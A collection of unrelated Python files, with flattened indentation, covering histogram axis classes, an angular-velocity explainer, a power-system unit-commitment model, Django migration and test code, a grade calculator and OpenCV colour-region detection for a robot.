# finite and thus cannot end up in a flow bin when growth is on
if "growth" in options and "circular" not in options:
self._ax = ca.integer_growth(start, stop, metadata)
elif options == {"underflow", "overflow"}:
self._ax = ca.integer_uoflow(start, stop, metadata)
elif options == {"underflow"}:
self._ax = ca.integer_uflow(start, stop, metadata)
elif options == {"overflow"}:
self._ax = ca.integer_oflow(start, stop, metadata)
elif (
"circular" in options and "growth" not in options
): # growth=True should work
self._ax = ca.integer_circular(
start, stop, metadata
) # flow bins do no matter
elif options == set():
self._ax = ca.integer_none(start, stop, metadata)
else:
raise KeyError("Unsupported collection of options")
@set_family(MAIN_FAMILY)
@set_module("boost_histogram.axis")
class Integer(BaseInteger, MainAxisMixin):
__slots__ = ()
def _repr_args(self):
"Return inner part of signature for use in repr"
return "{start:g}, {stop:g}".format(start=self.edges[0], stop=self.edges[-1])
@set_family(CPP_FAMILY)
@set_module("boost_histogram.cpp.axis")
class integer(BaseInteger, CppAxisMixin):
__slots__ = ()
@register({ca.category_str_growth, ca.category_str})
class BaseStrCategory(Axis):
__slots__ = ()
@inject_signature("self, categories, *, metadata=None, growth=False")
def __init__(self, categories, **kwargs):
"""
Make a category axis with strings; items will
be added to a predefined list of bins or a growing (with growth=True)
list of bins.
Parameters
----------
categories : Iterator[str]
The bin values in strings. May be empty if growth is enabled.
metadata : object
Any Python object to attach to the axis, like a label.
growth : bool = False
Allow the axis to grow if a value is encountered out of range.
Be careful, the axis will grow as large as needed.
"""
with KWArgs(kwargs) as k:
metadata = k.optional("metadata")
options = k.options(growth=False)
# We need to make sure we support Python 2 for now :(
# henryiii: This shortcut possibly should be removed
if isinstance(categories, (type(""), type(u""))):
categories = list(categories)
if options == {"growth"}:
self._ax = ca.category_str_growth(categories, metadata)
elif options == set():
self._ax = ca.category_str(categories, metadata)
else:
raise KeyError("Unsupported collection of options")
@register({ca.category_int, ca.category_int_growth})
class BaseIntCategory(Axis):
__slots__ = ()
@inject_signature("self, categories, *, metadata=None, growth=False")
def __init__(self, categories, **kwargs):
"""
Make a category axis with ints; items will
be added to a predefined list of bins or a growing (with growth=True)
list of bins. An empty list is allowed if growth=True.
Parameters
----------
categories : Iteratable[int]
The bin values, either ints or strings.
metadata : object
Any Python object to attach to the axis, like a label.
growth : bool = False
Allow the axis to grow if a value is encountered out of range.
Be careful, the axis will grow as large as needed.
"""
with KWArgs(kwargs) as k:
metadata = k.optional("metadata")
options = k.options(growth=False)
if options == {"growth"}:
self._ax = ca.category_int_growth(categories, metadata)
elif options == set():
self._ax = ca.category_int(categories, metadata)
else:
raise KeyError("Unsupported collection of options")
class CategoryMixin(object):
__slots__ = ()
def _repr_kwargs(self):
"""
Return options for use in repr. Metadata is last,
just in case it spans multiple lines.
This is specialized for Category axes to avoid repeating
the flow arguments unnecessarily.
"""
ret = ""
if self.options.growth:
ret += ", growth=True"
elif self.options.circular:
ret += ", circular=True"
if self.metadata is not None:
ret += ", metadata={0!r}".format(self.metadata)
return ret
@set_family(MAIN_FAMILY)
@set_module("boost_histogram.axis")
class StrCategory(BaseStrCategory, CategoryMixin, MainAxisMixin):
__slots__ = ()
def _repr_args(self):
"Return inner part of signature for use in repr"
return "[{0}]".format(", ".join(repr(c) for c in self))
@set_family(MAIN_FAMILY)
@set_module("boost_histogram.axis")
class IntCategory(BaseIntCategory, CategoryMixin, MainAxisMixin):
__slots__ = ()
def _repr_args(self):
"Return inner part of signature for use in repr"
return "[{0}]".format(", ".join(format(c, "g") for c in self))
@set_family(CPP_FAMILY)
@set_module("boost_histogram.cpp.axis")
class int_category(BaseIntCategory, CppAxisMixin):
__slots__ = ()
@set_family(CPP_FAMILY)
@set_module("boost_histogram.cpp.axis")
class str_category(BaseStrCategory, CppAxisMixin):
__slots__ = ()
|
#!/usr/bin/env python
# coding: utf-8
# # Angular Velocity
# There are two ways to think about <i>angular velocity</i>.
#
# ## Case 1
# Body 1 is orbiting body 2, just like Earth travels on a curved path about the sun's rotational axis.
# 
# <i>Caption</i>. On the left, imagine having a bird's eye view of the plane that body 1 is orbiting body 2 (black dot at center) in. If body 1 were to conserve its angular velocity, body 1's orbital speed would quicken as its orbital distance from the center increased (from A to D). Credit: G. O. Hollyday.
# The velocity with which Earth orbits the sun is Earth's angular velocity. The speed of Earth's trajectory around the sun would be faster if Earth were closer to the sun and maintained its angular velocity. The farther body 1 is from body 2, the faster body 1's linear velocity will be to complete an orbit in the same amount of time (in order to maintain its angular velocity)(see image above).
#
# ## Case 2
# A component of a body rotates within and as part of a single body (this is called <i>solid body rotation</i>). Every component of a single body is rotating about an axis of rotation.
# 
# <i>Caption</i>. As the figure skater's body rotates with the same angular velocity $\omega$, body parts farther from the figure skater's axis of rotation, or those with greater radius R, will have a higher orbital speed. In this pose, the figure skater's shoulder has a slower orbital speed than her foot, although both body parts are traveling at the same angular velocity. Credit: G. O. Hollyday.
# For example, a figure skater spins with a certain angular velocity. Since each part of their body is connected [think of your body as a connected collection of very small volumes (e.g. cells, body parts)], every component rotates together at the same angular velocity. Each component has the same angular velocity, but may be moving at a different speed than other components in order to remain part of the body.
#
# Start by considering a spinning figure skater with her leg extended (see image above). The foot (red R$_2$) has a larger radius and has to travel a longer arc about the body to line up with the shoulder (pink R$_1$), which is closer to the rotational axis (maroon $\omega$) and does not have to travel as large of a distance about the body. In the same amount of time (over the same angle change), these body parts must travel different speeds to maintain the body's rate of rotation (angular velocity). A component must move faster if it is located at larger radii from the rotational axis, so the foot would have a faster linear velocity than the shoulder would.
#
# The figure skater in the image above spins with the same angular velocity even though her outstretched limbs may travel at faster linear velocities than her torso.
#
# The relationship between angular velocity $\omega$ and linear velocity v is
#
# $$v = r \times \omega$$
#
# where r is the distance from the body to the rotational axis (the axis about which the body is rotating with angular velocity $\omega$). The component of the body's linear velocity that affects the magnitude (value) of angular velocity is perpendicular to the radius vector and perpendicular to the rotational axis.
#
# A solid, rotating body can have the same angular velocity, yet portions of the body at different radii will have different linear velocities. If we are only looking at the angular velocity in z, so that our rotational axis is z, then the perpendicular radii would make up different sized orbits in the xy plane (at various z). You can also think of the distances from the rotational axis as nested cylinders. The outer orbits/cylinders would be at larger radii, so to maintain the body's rotational velocity, that portion of the body would need a linear velocity (tangential to the orbit/cylinder made in the xy plane, or rather, perpendicular to the radius) that is faster than the portions of the body at smaller orbits/cylinders (radii).
#
# What if there was a rotating planetary body that could not rotate together at the same angular velocity? This is true for a synestia. We define a synestia by describing it in terms of solid body rotation (Case 2). The inner planet-like region of a synestia corotates at the same angular velocity, but the outer disk-like region rotates with slower angular velocities.
|
from .response import BotResponse
class NothingResponse(BotResponse):
def run(self):
pass
|
# Copyright 2015 The Switch Authors. All rights reserved.
# Licensed under the Apache License, Version 2, which is in the LICENSE file.
"""
Defines model components to describe unit commitment of projects for the
SWITCH-Pyomo model. This module is mutually exclusive with the
project.no_commit module which specifies simplified dispatch
constraints. If you want to use this module directly in a list of switch
modules (instead of including the package project.unitcommit), you will also
need to include the module project.unitcommit.fuel_use.
SYNOPSIS
>>> from switch_mod.utilities import define_AbstractModel
>>> model = define_AbstractModel(
... 'timescales', 'financials', 'load_zones', 'fuels',
... 'gen_tech', 'project.build', 'project.dispatch', 'project.unitcommit')
>>> instance = model.load_inputs(inputs_dir='test_dat')
"""
import os
from pyomo.environ import *
def define_components(mod):
"""
Adds components to a Pyomo abstract model object to describe
unit commitment for projects. Unless otherwise stated, all power
capacity is specified in units of MW and all sets and parameters
are mandatory.
-- Commit decision, limits, and headroom --
CommitProject[(proj, t) in PROJ_DISPATCH_POINTS] is a decision
variable of how much capacity (MW) from each project to commit in
each timepoint. By default, this operates in continuous mode.
Include the project.unitcommit.discrete module to force this to
operate with discrete unit commitment.
proj_max_commit_fraction[(proj, t) in PROJ_DISPATCH_POINTS]
describes the maximum commit level as a fraction of available
capacity (capacity that is built and expected to be available for
commitment; derated by annual expected outage rate). This has
limited use cases, but could be used to simulate outages (scheduled
or non-scheduled) in a production-cost simulation. This optional
parameter has a default value of 1.0, indicating that all available
capacity can be commited. If you wish to have discrete unit
commitment, I advise overriding the default behavior and specifying
a more discrete treatment of outages.
proj_min_commit_fraction[(proj, t) in PROJ_DISPATCH_POINTS]
describes the minimum commit level as a fraction of available
capacity. This is useful for describing must-run plants that ensure
reliable grid operations, and for forcing hydro plants operate at
some minimal level to maintain streamflow. This can also be used to
specify baseload plants that must be run year-round. This optional
parameter will default to proj_max_commit_fraction for generation
technologies marked baseload and 0 for all other generators.
CommitLowerLimit[(proj, t) in PROJ_DISPATCH_POINTS] is an expression
that describes the minimum capacity that must be committed. This is
derived from installed capacity and proj_min_commit_fraction.
CommitUpperLimit[(proj, t) in PROJ_DISPATCH_POINTS] is an expression
that describes the maximum capacity available for commitment. This
is derived from installed capacity and proj_max_commit_fraction.
Enforce_Commit_Lower_Limit[(proj, t) in PROJ_DISPATCH_POINTS] and
Enforce_Commit_Upper_Limit[(proj, t) in PROJ_DISPATCH_POINTS] are
constraints that limit CommitProject to the upper and lower bounds
defined above.
CommitLowerLimit <= CommitProject <= CommitUpperLimit
CommitSlackUp[(proj, t) in PROJ_DISPATCH_POINTS] is an expression
that describes the amount of additional capacity available for
commitment: CommitUpperLimit - CommitProject
CommitSlackDown[(proj, t) in PROJ_DISPATCH_POINTS] is an expression
that describes the amount of committed capacity that could be taken
offline: CommitProject - CommitLowerLimit
-- Startup and Shutdown --
The capacity started up or shutdown is completely determined by
the change in CommitProject from one hour to the next, but we can't
calculate these directly directly within the linear program because
linear programs don't have if statements. Instead, we'll define extra
decision variables that are tightly constrained. Since startup incurs
costs and shutdown does not, the linear program will not simultaneously
set both of these to non-zero values.
Startup[(proj, t) in PROJ_DISPATCH_POINTS] is a decision variable
describing how much additional capacity was brought online in a given
timepoint. Committing additional capacity incurs startup costs for
fossil plants from fuel requirements as well as additional O&M
costs.
Shutdown[(proj, t) in PROJ_DISPATCH_POINTS] is a decision variable
describing how much committed capacity to take offline in a given
timepoint.
Commit_Startup_Shutdown_Consistency[(proj, t) in
PROJ_DISPATCH_POINTS] is a constraint that forces consistency
between commitment decision from one hour to the next with startup
and shutdown.
g_startup_fuel[g in FUEL_BASED_GEN] describes fuel
requirements of starting up additional generation capacity expressed
in units of MMBTU / MW. This optional parameter has a default value
of 0.
proj_startup_fuel[proj in FUEL_BASED_PROJECTS] is the same as
g_startup_fuel except on a project basis. This optional parameter
defaults to g_startup_fuel.
g_startup_om[g in GENERATION_TECHNOLOGIES] describes operations and
maintenance costs incured from starting up additional generation
capacity expressed in units of $base_year / MW. This could represent
direct maintenance requirements or some overall depreciation rate
from accelerated wear and tear. This optional parameter has a
default value of 0.
proj_startup_om[proj in PROJECTS] is the same as g_startup_om except
on a project basis. This optional parameter defaults to g_startup_om.
Total_Startup_OM_Costs[t in TIMEPOINTS] is an expression for passing
total startup O&M costs to the sys_cost module.
-- Dispatch limits based on committed capacity --
g_min_load_fraction[g] describes the minimum loading level of a
generation technology as a fraction of committed capacity. Many
fossil plants - especially baseload - have a minimum run level which
should be stored here. Note that this is only applied to committed
capacity. This is an optional parameter that defaults to 1 for
generation technologies marked baseload and 0 for all other
generators. This parameter is only relevant when considering unit
commitment so it is defined here rather than the gen_tech module.
proj_min_cap_factor[(proj, t) in PROJ_DISPATCH_POINTS] describes the
minimum loadding level for each project and timepoint as a fraction
of committed capacity. This is an optional parameter that defaults
to g_min_load_fraction, which in turn defaults to 0. You may wish to
vary this by timepoint to establish minimum flow rates for
hydropower, to specify thermal demand for a cogeneration project, or
specify must-run reliability constraints in a geographically or
temporally detailed model. This could also be used to constrain
dispatch of distributed solar resources that cannot be curtailed by
the system operator.
DispatchLowerLimit[(proj, t) in PROJ_DISPATCH_POINTS] and
DispatchUpperLimit[(proj, t) in PROJ_DISPATCH_POINTS] are
expressions that define the lower and upper bounds of dispatch.
Lower bounds are calculated as CommitProject * proj_min_cap_factor,
and upper bounds are calculated relative to committed capacity and
renewable resource availability.
Enforce_Dispatch_Lower_Limit[(proj, t) in PROJ_DISPATCH_POINTS] and
Enforce_Dispatch_Upper_Limit[(proj, t) in PROJ_DISPATCH_POINTS] are
constraints that limit DispatchProj to the upper and lower bounds
defined above.
DispatchLowerLimit <= DispatchProj <= DispatchUpperLimit
DispatchSlackUp[(proj, t) in PROJ_DISPATCH_POINTS] is an expression
that describes the amount of additional commited capacity available
for dispatch: DispatchUpperLimit - DispatchProj
DispatchSlackDown[(proj, t) in PROJ_DISPATCH_POINTS] is an
expression that describes the amount by which dispatch could be
lowered, that is how much downramp potential each project has
in each timepoint: DispatchProj - DispatchLowerLimit
"""
# Commitment decision, bounds and associated slack variables
mod.CommitProject = Var(
mod.PROJ_DISPATCH_POINTS,
within=NonNegativeReals)
mod.proj_max_commit_fraction = Param(
mod.PROJ_DISPATCH_POINTS,
within=PercentFraction,
default=lambda m, proj, t: 1.0)
mod.proj_min_commit_fraction = Param(
mod.PROJ_DISPATCH_POINTS,
within=PercentFraction,
default=lambda m, proj, t: (
m.proj_max_commit_fraction[proj, t]
if proj in m.BASELOAD_PROJECTS
else 0.0))
mod.CommitLowerLimit = Expression(
mod.PROJ_DISPATCH_POINTS,
initialize=lambda m, proj, t: (
m.ProjCapacityTP[proj, t] * m.proj_availability[proj] *
m.proj_min_commit_fraction[proj, t]))
mod.CommitUpperLimit = Expression(
mod.PROJ_DISPATCH_POINTS,
initialize=lambda m, proj, t: (
m.ProjCapacityTP[proj, t] * m.proj_availability[proj] *
m.proj_max_commit_fraction[proj, t]))
mod.Enforce_Commit_Lower_Limit = Constraint(
mod.PROJ_DISPATCH_POINTS,
rule=lambda m, proj, t: (
m.CommitLowerLimit[proj, t] <= m.CommitProject[proj, t]))
mod.Enforce_Commit_Upper_Limit = Constraint(
mod.PROJ_DISPATCH_POINTS,
rule=lambda m, proj, t: (
m.CommitProject[proj, t] <= m.CommitUpperLimit[proj, t]))
mod.CommitSlackUp = Expression(
mod.PROJ_DISPATCH_POINTS,
initialize=lambda m, proj, t: (
m.CommitUpperLimit[proj, t] - m.CommitProject[proj, t]))
mod.CommitSlackDown = Expression(
mod.PROJ_DISPATCH_POINTS,
initialize=lambda m, proj, t: (
m.CommitProject[proj, t] - m.CommitLowerLimit[proj, t]))
# Startup & Shutdown
mod.Startup = Var(
mod.PROJ_DISPATCH_POINTS,
within=NonNegativeReals)
mod.Shutdown = Var(
mod.PROJ_DISPATCH_POINTS,
within=NonNegativeReals)
mod.Commit_Startup_Shutdown_Consistency = Constraint(
mod.PROJ_DISPATCH_POINTS,
rule=lambda m, pr, t: (
m.CommitProject[pr, m.tp_previous[t]] +
m.Startup[pr, t] - m.Shutdown[pr, t] == m.CommitProject[pr, t]))
mod.g_startup_fuel = Param(mod.FUEL_BASED_GEN, default=0.0)
mod.g_startup_om = Param(mod.GENERATION_TECHNOLOGIES, default=0.0)
mod.proj_startup_fuel = Param(
mod.FUEL_BASED_PROJECTS,
default=lambda m, pr: m.g_startup_fuel[m.proj_gen_tech[pr]])
mod.proj_startup_om = Param(
mod.PROJECTS,
default=lambda m, pr: m.g_startup_om[m.proj_gen_tech[pr]])
# Startup costs need to be divided over the duration of the
# timepoint because it is a one-time expenditure in units of $
# but cost_components_tp requires an hourly cost rate in $ / hr.
mod.Total_Startup_OM_Costs = Expression(
mod.TIMEPOINTS,
initialize=lambda m, t: sum(
m.proj_startup_om[proj] * m.Startup[proj, t] / m.tp_duration_hrs[t]
for (proj, t2) in m.PROJ_DISPATCH_POINTS
if t == t2))
mod.cost_components_tp.append('Total_Startup_OM_Costs')
# Dispatch limits relative to committed capacity.
mod.g_min_load_fraction = Param(
mod.GENERATION_TECHNOLOGIES,
within=PercentFraction,
default=lambda m, g: 1.0 if m.g_is_baseload[g] else 0.0)
mod.proj_min_load_fraction = Param(
mod.PROJ_DISPATCH_POINTS,
default=lambda m, pr, t: m.g_min_load_fraction[m.proj_gen_tech[pr]])
mod.DispatchLowerLimit = Expression(
mod.PROJ_DISPATCH_POINTS,
initialize=lambda m, pr, t: (
m.CommitProject[pr, t] * m.proj_min_load_fraction[pr, t]))
def DispatchUpperLimit_expr(m, pr, t):
if pr in m.VARIABLE_PROJECTS:
return m.CommitProject[pr, t] * m.prj_max_capacity_factor[pr, t]
else:
return m.CommitProject[pr, t]
mod.DispatchUpperLimit = Expression(
mod.PROJ_DISPATCH_POINTS,
initialize=DispatchUpperLimit_expr)
mod.Enforce_Dispatch_Lower_Limit = Constraint(
mod.PROJ_DISPATCH_POINTS,
rule=lambda m, proj, t: (
m.DispatchLowerLimit[proj, t] <= m.DispatchProj[proj, t]))
mod.Enforce_Dispatch_Upper_Limit = Constraint(
mod.PROJ_DISPATCH_POINTS,
rule=lambda m, proj, t: (
m.DispatchProj[proj, t] <= m.DispatchUpperLimit[proj, t]))
mod.DispatchSlackUp = Expression(
mod.PROJ_DISPATCH_POINTS,
initialize=lambda m, proj, t: (
m.DispatchUpperLimit[proj, t] - m.DispatchProj[proj, t]))
mod.DispatchSlackDown = Expression(
mod.PROJ_DISPATCH_POINTS,
initialize=lambda m, proj, t: (
m.DispatchProj[proj, t] - m.DispatchLowerLimit[proj, t]))
def load_inputs(mod, switch_data, inputs_dir):
"""
Import data to support unit commitment. The following files are
expected in the input directory. All files and fields are optional.
If you only want to override default values for certain columns in a
row, insert a dot . into the other columns.
gen_unit_commit.tab
generation_technology, g_min_load_fraction, g_startup_fuel,
g_startup_om
Note: If you need to specify minimum loading fraction or startup
costs for a non-fuel based generator, you must put a dot . in the
g_startup_fuel column to avoid an error.
proj_commit_bounds_timeseries.tab
PROJECT, TIMEPOINT, proj_min_commit_fraction, proj_max_commit_fraction,
proj_min_load_fraction
"""
switch_data.load_aug(
optional=True,
filename=os.path.join(inputs_dir, 'gen_unit_commit.tab'),
select=('generation_technology', 'g_min_load_fraction',
'g_startup_fuel', 'g_startup_om'),
param=(mod.g_min_load_fraction, mod.g_startup_fuel,
mod.g_startup_om))
switch_data.load_aug(
optional=True,
filename=os.path.join(inputs_dir, 'proj_commit_bounds_timeseries.tab'),
select=('PROJECT', 'TIMEPOINT', 'proj_min_commit_fraction',
'proj_max_commit_fraction', 'proj_min_load_fraction'),
param=(mod.proj_min_commit_fraction, mod.proj_max_commit_fraction,
mod.proj_min_load_fraction))
|
# Generated by Django 2.2.1 on 2019-11-12 16:47
import core.storage.utils
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0007_auto_20190827_1138'),
]
operations = [
migrations.AddField(
model_name='user',
name='image',
field=models.ImageField(blank=True, null=True, upload_to=core.storage.utils.public_image_upload_to),
),
]
|
#!/usr/bin/env python
"""
_GetOutputMap_
MySQL implementation of Jobs.GetOutputMap
"""
from WMCore.Database.DBFormatter import DBFormatter
class GetOutputMap(DBFormatter):
sql = """SELECT wmbs_workflow_output.output_identifier AS wf_output_id,
wmbs_workflow_output.output_fileset AS wf_output_fset,
wmbs_workflow_output.merged_output_fileset AS wf_output_mfset
FROM wmbs_workflow_output
INNER JOIN wmbs_subscription ON
wmbs_workflow_output.workflow_id = wmbs_subscription.workflow
INNER JOIN wmbs_jobgroup ON
wmbs_subscription.id = wmbs_jobgroup.subscription
INNER JOIN wmbs_job ON
wmbs_jobgroup.id = wmbs_job.jobgroup
WHERE wmbs_job.id = :jobid"""
def execute(self, jobID, conn = None, transaction = False):
results = self.dbi.processData(self.sql, {"jobid": jobID}, conn = conn,
transaction = transaction)
outputMap = {}
for result in self.formatDict(results):
if result["wf_output_id"] not in outputMap:
outputMap[result["wf_output_id"]] = []
outputMap[result["wf_output_id"]].append({"output_fileset": result["wf_output_fset"],
"merged_output_fileset": result["wf_output_mfset"]})
return outputMap
|
# scored.py
# Repeatedly read test scores (from 0 to 100), until the user
# enter -1 to finish. The input part of the program will ensure
# that the numbers are in the correct range.
# For each score, report the corresponding grade:
# 90-100 = A, 80-89 = B, 70-79 = C, 60-69 = D, < 60 = F
# When you have all the scores, report the number of scores
# entered, the total points and the average score.
# Display letter grade
def display_grade(score):
if score >= 90:
print("Congratulations! That is an A.")
elif score >= 80:
print("Good job. That is a B.")
elif score >= 70:
print("You are passing with a C.")
elif score >= 60:
print("Please study more. You have a D.")
else:
print("Sorry, that is an F.")
# Prompt user for score and returns score
def get_score():
valid = False
# Enter scores until a valid score is entered
while not valid:
score = float(input('Enter a score 0-100, or -1 to finish: '))
# Check if valid score was entered
if score == -1 or (score >=0 and score <= 100):
valid = True
else:
print("Please enter a valid score.")
return score
def main():
# Intialize the count of scores and total scores
count_scores = 0
total_scores = 0
# Keep entering scores until finished is set to true
finished = False
# Enter score until the user enters -1
while not finished:
score = get_score()
# Check if user is finished entering scores
if score == -1:
finished = True
else:
# Display letter grade
display_grade(score)
# Update count of scores and total score
count_scores += 1
total_scores += score
# Display number of scores, total score and average if scores were entered
if count_scores > 0:
average = total_scores / count_scores
print(f"Total number of scores: {count_scores}")
print(f"Total number of points: {total_scores:.1f}")
print(f"Average score: {average:.2f}")
else:
print("No scores entered; no average computed.")
# Call main function
main()
|
## -*- coding: utf-8 -*-
import sys
import cv2
import numpy as np
import time
from math import sqrt
ball_color = 'yellow'
color_dist = {'red': {'Lower': np.array([0, 60, 60]), 'Upper': np.array([6, 255, 255])},
'blue': {'Lower': np.array([100, 80, 46]), 'Upper': np.array([124, 255, 255])},
'green': {'Lower': np.array([35, 43, 35]), 'Upper': np.array([90, 255, 255])},
'yellow':{'Lower': np.array([0, 70, 70]), 'Upper': np.array([100, 255, 255])},
}
#cv2.namedWindow('camera', cv2.WINDOW_AUTOSIZE)
#实际图像像素与实际距离转换
def pixel_to_distance(width):
acttual_distance = 0.09500 / width
return acttual_distance
#去畸变函数
def correct_img(img):
camera_matrix = [[371.450355, 0.000000, 320.451676],
[0.000000, 494.574368, 234.028774],
[0.000000, 0.000000, 1.000000]] #摄像头内部矩阵
mtx = np.float32(camera_matrix)
h, w = img.shape[:2]
dist = [-0.347383, 0.081498, 0.004733, -0.001698, 0.000000] #畸变矩阵
dist = np.float32(dist)
newcameramtx, roi = cv2.getOptimalNewCameraMatrix(mtx, dist, (w, h), 1, (w, h)) # 自由比例参数
dst = cv2.undistort(img, mtx, dist, None, newcameramtx)
return dst
#转换图像实际坐标x,y
def coordinate_transformation(frame):
actural_central_x = []
actural_central_y = []
if frame is not None:
# frame = cv2.flip(frame,0)
# 进行图像去畸变,中心点重置,设为图像的中心点
img1 = frame
img1 = correct_img(img1) #图像去畸变
#img1 = cv2.flip(img1, 0) #垂直反转,将图像转正
gs_frame = cv2.GaussianBlur(img1, (5, 5), 0) # 高斯模糊
hsv = cv2.cvtColor(gs_frame, cv2.COLOR_BGR2HSV) # 转化成HSV图像
erode_hsv = cv2.erode(hsv, None, iterations=2) # 腐蚀 粗的变细
inRange_hsv = cv2.inRange(erode_hsv, color_dist[ball_color]['Lower'], color_dist[ball_color]['Upper'])
cnts = cv2.findContours(inRange_hsv.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]
if cnts != []:
c = max(cnts, key=cv2.contourArea)
rect = cv2.minAreaRect(c)
box = cv2.boxPoints(rect)
box = np.int0(box)
#print(box)
# 坐标原点左上角,以离原点坐标最近为第一个点,顺时针方向排序
# 中心坐标转换
box1 = box[1]
box2 = box[2]
box3 = box[3]
box4 = box[0]
a_point_x = box1[0] - 320
b_point_x = box2[0] - 320
c_point_x = box3[0] - 320
d_point_x = box4[0] - 320
a_point_y = box1[1] - 240
b_point_y = box2[1] - 240
c_point_y = box3[1] - 240
d_point_y = box4[1] - 240
if c_point_x > a_point_x:
central_point_x = (a_point_x + c_point_x) * 0.5
central_point_y = (a_point_y + c_point_y) * 0.5
width = sqrt((b_point_x - a_point_x) ** 2 + (b_point_y - a_point_y) ** 2) #像素距离
l = pixel_to_distance(width) #像素与图像比例
actural_central_x = -central_point_x * l
actural_central_y = central_point_y * l + 0.05
#画框
#cv2.drawContours(img1, [np.int0(box)], -1, (0, 255, 255), 2)
else:
print("image is an empty !!!")
#cv2.imshow('correct', img1)
#cv2.waitKey(10)
return actural_central_x, actural_central_y
# 提取图像矫正
def cr_img(frame):
result_img = []
if frame is not None:
# 进行原图矫正
img = frame
# img = cv2.flip(img, 1)
# img = cv2.flip(img, 0) # 垂直反转,将图像转正
gs_frame = cv2.GaussianBlur(img, (5, 5), 0) # 高斯模糊
hsv = cv2.cvtColor(gs_frame, cv2.COLOR_BGR2HSV) # 转化成HSV图像
erode_hsv = cv2.erode(hsv, None, iterations=2) # 腐蚀 粗的变细
inRange_hsv = cv2.inRange(erode_hsv, color_dist[ball_color]['Lower'], color_dist[ball_color]['Upper'])
cnts = cv2.findContours(inRange_hsv.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]
if cnts != []:
c = max(cnts, key=cv2.contourArea)
rect = cv2.minAreaRect(c)
angle = rect[2]
box = cv2.boxPoints(rect)
box = np.int0(box)
draw_img = cv2.drawContours(img.copy(), [box], -1, (0, 0, 255), 3)
rows, cols = img.shape[:2]
M = cv2.getRotationMatrix2D((cols / 2, rows / 2), angle, 1)
result_img = cv2.warpAffine(img, M, (cols, rows))
return result_img
#提取图像中黄色区域并裁剪
def cutimg(frame):
img = []
if frame is not None:
# 进行原图分离黄色区域并剪裁,进行文字识别
img = frame
img1 = frame.copy()
gs_frame = cv2.GaussianBlur(frame, (5, 5), 0) # 高斯模糊
hsv = cv2.cvtColor(gs_frame, cv2.COLOR_BGR2HSV) # 转化成HSV图像
erode_hsv = cv2.erode(hsv, None, iterations=2) # 腐蚀 粗的变细
inRange_hsv = cv2.inRange(erode_hsv, color_dist[ball_color]['Lower'], color_dist[ball_color]['Upper'])
cnts = cv2.findContours(inRange_hsv.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]
if cnts != []:
c = max(cnts, key=cv2.contourArea)
rect = cv2.minAreaRect(c)
box = cv2.boxPoints(rect)
box = np.int0(box)
# 原图剪裁
box1 = box[1]
box2 = box[2]
box3 = box[3]
box4 = box[0]
a_point_x1 = box1[0]
b_point_x1 = box2[0]
c_point_x1 = box3[0]
d_point_x1 = box4[0]
a_point_y1 = box1[1]
b_point_y1 = box2[1]
c_point_y1 = box3[1]
d_point_y1 = box4[1]
central_point_x1 = (a_point_x1 + c_point_x1) * 0.5
central_point_y1 = (a_point_y1 + c_point_y1) * 0.5
x = int((c_point_x1 - a_point_x1))
y = int((c_point_y1 - a_point_y1))
x1 = central_point_x1 - a_point_x1
y1 = central_point_y1 - b_point_y1
S = x * y
if S != 0 :
if central_point_y1 - y1 < 0 or central_point_x1 - x1 < 0:
img = img[0:int(central_point_y1 + y1),
0:int(central_point_x1 + x1)]
else:
img = img[int(central_point_y1 - y1):int(central_point_y1 + y1),
int(central_point_x1 - x1):int(central_point_x1 + x1)]
# 画框
#cv2.drawContours(frame, [np.int0(box)], -1, (0, 255, 255), 2)
#cv2.imshow('cut', img)
#cv2.waitKey(10)
#img = img_resize_to_target_white(img)
#cv2.imshow('yuantu', frame)
#cv2.waitKey(10)
return img
#转换释放蓝色图像实际坐标x,y
def put_down_transformation(frame):
actural_central_put_x = []
actural_central_put_y = []
if frame is not None:
# frame = cv2.flip(frame,0)
# 进行图像去畸变,中心点重置,设为图像的中心点
img = correct_img(frame) #图像去畸变
#img = cv2.flip(img, 0) #垂直反转,将图像转正
gs_frame = cv2.GaussianBlur(img, (5, 5), 0) # 高斯模糊
hsv = cv2.cvtColor(gs_frame, cv2.COLOR_BGR2HSV) # 转化成HSV图像
erode_hsv = cv2.erode(hsv, None, iterations=2) # 腐蚀 粗的变细
inRange_hsv = cv2.inRange(erode_hsv, color_dist['blue']['Lower'], color_dist['blue']['Upper'])
cnts = cv2.findContours(inRange_hsv.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]
if cnts != []:
c = max(cnts, key=cv2.contourArea)
rect = cv2.minAreaRect(c)
box = cv2.boxPoints(rect)
box = np.int0(box)
#print(box)
# 坐标原点左上角,以离原点坐标最近为第一个点,顺时针方向排序
# 中心坐标转换
box1 = box[1]
box2 = box[2]
box3 = box[3]
box4 = box[0]
a_point_x = box1[0] - 320
b_point_x = box2[0] - 320
c_point_x = box3[0] - 320
d_point_x = box4[0] - 320
a_point_y = box1[1] - 240
b_point_y = box2[1] - 240
c_point_y = box3[1] - 240
d_point_y = box4[1] - 240
if c_point_x > a_point_x:
central_point_x = (a_point_x + c_point_x) * 0.5
central_point_y = (a_point_y + c_point_y) * 0.5
width = sqrt((b_point_x - a_point_x) ** 2 + (b_point_y - a_point_y) ** 2) #像素距离
l = pixel_to_distance(width) #像素与图像比例
actural_central_put_x = -central_point_x * l
actural_central_put_y = central_point_y * l + 0.05
#画框
#cv2.drawContours(img, [np.int0(box)], -1, (0, 255, 255), 2)
else:
print("image is an empty !!!")
#cv2.imshow('correct', img)
#cv2.waitKey(10)
return actural_central_put_x, actural_central_put_y
#获取实际坐标及剪切图像
def cut_coordinate(frame):
if frame != []:
img = frame.copy()
actural_central_x, actural_central_y = coordinate_transformation(frame)
#img = cr_img(img)
img = cutimg(img)
#img = cv2.flip(img,0)
return actural_central_x, actural_central_y, img
|
dist=float(input('qual a distancia da viagem em km? '))
if dist<=200:
preco=0.50*dist
else:
preco=0.45*dist
print('a passagem será de R${:.2f}.'.format(preco))
|
from decimal import Decimal, ROUND_HALF_UP
from django.test import TestCase
from .utils import create_test_expenses
from ..models import Expense
from ..reports import summary_overall
class ReportsTestCase(TestCase):
"""Test reports utilities for the expenses"""
def setUp(self) -> None:
"""Set up for the reports utilities tests"""
create_test_expenses()
def test_summary_overall(self) -> None:
"""Test if summary_overall properly sums amount of expenses"""
queryset = Expense.objects.all()
